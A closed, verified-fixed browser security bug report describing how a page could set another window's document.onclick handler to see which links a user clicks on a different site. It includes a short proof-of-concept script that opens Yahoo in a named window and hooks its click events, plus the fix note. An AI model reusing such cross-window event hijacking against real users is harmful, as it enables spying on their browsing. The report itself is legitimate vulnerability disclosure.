Closed Bug 24152 Opened 25 years ago Closed 25 years ago

document.onclick shows links from other window

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

It is possible to change the document.onclick event handler and this allows
seeing the link on which the user has clicked.
The code is:
------------------------------------------------
<SCRIPT>
function ev(event)
{
alert("You clicked on: "+event.target.data);
}
a=window.open("http://www.yahoo.com","victim");
setTimeout("a.document.onclick = ev;",5000);
</SCRIPT>
------------------------------------------------
Status: NEW → ASSIGNED
Target Milestone: M14
Fixed: DOM prop eventtarget.addeventlistener now controls access to this event 
handler.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.